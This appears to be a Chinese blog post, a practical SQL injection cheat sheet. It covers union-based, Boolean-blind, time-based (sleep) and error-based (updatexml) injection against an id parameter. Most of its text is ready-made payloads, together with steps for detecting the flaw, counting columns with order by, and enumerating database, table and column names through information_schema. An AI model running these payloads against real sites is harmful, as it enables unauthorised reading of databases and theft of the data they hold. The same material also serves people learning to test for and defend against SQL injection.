时间:2021-07-01 10:21:17 帮助过:44人阅读
目录
information_schema数据库的三个表及其中的字段
几个函数
适用条件
查询后直接将结果数据直接显示在页面的情况,可以尝试union注入。
判断是否存在注入
尝试id=1
和id=1‘
,查看结果是否相同;
尝试id=1 and 1=1
和id=1 and 1=2
,查看结果是否相同;
结果不同表示可能存在sql注入。
判断查询语句的字段数
order by
后跟的数字可以暗示查询语句中查询了几个字段。
id=1 order by 1
,
id=1 order by 2
,
id=1 order by 3
均可以执行,与id=1
结果相同。
id=1 order by 4
与id=1
结果不同,则表示查询字段有3个。
为什么要知道查询语句的字段数
在union查询中,前后两个查询语句查询的字段数必须相同。
注入语句
1. 修改id,使id=-1
id=1 union select 1,2,3
没有返回select 1,2,3
的结果。id=-1
,因为不存在该条目,所以会返回union后查询语句的结果。2. 查看可输出位置
id=-1 union select 1,2,3
查看三个查询参数哪个位置会输出Mysql语句。3. 查询数据库
id=-1 union select 1,database(),3
在可以输出的位置2,使用database()查询。id=-1 union select SCHEMA_NAME from information_schema.schemata
查询information_schema库中所有的数据库名字。4. 查询表名
select TABLE_NAME from information_schema.tables where TABLE_SCHEMA=‘DBxxx‘
id=-1 union select 1,(select TABLE_NAME from information_schema.tables where TABLE_SCHEMA=‘DBxxx‘),3
5. 查询字段名
select COLUMN_NAME from information_schema.columns where TABLE_SCHEMA=‘DBxxx‘ and TABLE_NAME=‘Tablexxx‘
id=-1 union select 1,(select COLUMN_NAME from information_schema.columns where TABLE_SCHEMA=‘DBxxx‘ and TABLE_NAME=‘Tablexxx‘),3
6. 查询字段对应的数据
select Columnxxx from DBxxx.Tablexxx
Boolean注入是构造sql判断语句,根据页面返回结果,来推测哪些判断条件是成立的,以此来获取数据库的数据。
适用条件
修改id后的内容,当页面不返回数据而是只返回yes或no时,无法使用union注入,可以尝试Boolean注入。
获取参数后,代码中通过preg_match过滤了“union/sleep/benchmark”等危险字符,然后才将参数拼接到sql语句进行查询。
判断是否可以进行Boolean注入
尝试id=1
和id=1‘
,查看结果,第一个为yes,第二个为no。
尝试id=1‘ and 1=1
和id=1‘ and 1=2
,查看结果,结果认为yes和no。
尝试修改id的值,返回结果依旧是yes和no,由此可判断页面只返回yes和no,需要进行Boolean注入。
注入语句
1. 判断数据库名长度
id=1‘ and length(database())>=3 --+
‘ and length(database())>=4 --+
为no时,说明数据库名长度为3。2. 逐字符判断数据库名
id=1‘ and substr(database(),1,1)=‘a‘ --+
limit0,1
不同,limit0,1
是从第0个开始,substr()是从第1个开始。id=1‘ and ord(substr(database(),1,1))=96 --+
3. 表名及字段名查询
id=1‘ and length(database())>=3 --+
id=1‘ and substr(database(),1,1)=‘a‘ --+
select SCHEMA_NAME from information_schema.schemata
id=1‘ and substr((select SCHEMA_NAME from information_schema.schemata),1,1)=‘a‘ --+
select TABLE_NAME from information_schema.tables where TABLE_SCHEMA=‘DBxxx‘
id=1‘ and substr((select TABLE_NAME from information_schema.tables where TABLE_SCHEMA=‘DBxxx‘),1,1)=‘a‘ --+
select COLUMN_NAME from information_schema.columns where TABLE_SCHEMA=‘DBxxx‘ and TABLE_NAME=‘Tablexxx‘
id=1‘ and substr((select COLUMN_NAME from information_schema.columns where TABLE_SCHEMA=‘DBxxx‘ and TABLE_NAME=‘Tablexxx‘),1,1)=‘a‘ --+
时间注入利用sleep()和benchmark()等函数使sql查询执行时间延长,从而判断条件是否正确,推断数据库信息。
适用条件
修改id后的内容,当页面不返回数据而是只返回yes或no时,无法使用union注入,且可以使用sleep()函数使得sql查询执行时间延长,可以尝试时间注入。
与Boolean注入的区别
没有过滤"sleep"或“benchmark”字符。
注入语句
if(expr1,expr2,expr3)
a?b:c
.1. 判断数据库名长度
id=1‘ and if(length(database())>=3,sleep(5),1) --+
2. 逐字符判断数据库名
id=1‘ and if(substr(database(),1,1)=‘a‘ ,sleep(5),1) --+
利用错误回显,使用floor()、updatexml()等函数将所需信息输出到页面上。
适用条件
尝试id=1‘
,多一个单引号会引发错误,页面回显错误信息,可以尝试报错注入。
注入语句
id=1‘ and updatexml(1,concat(0x7e,(可替换的查询语句),0x7e),1) --+
limit 0,1
做限制。select database()
select user()
select SCHEMA_NAME from information_schema.schemata limit 0,1
select TABLE_NAME from information_schema.tables where TABLE_SCHEMA=‘DBxxx‘ limit 0,1
select COLUMN_NAME from information_schema.columns where TABLE_SCHEMA=‘DBxxx‘ and TABLE_NAME=‘Tablexxx‘ limit 0,1
sql注入-实用小手册
标签:无法 说明 benchmark containe psu 注入 user 条件表达式 区别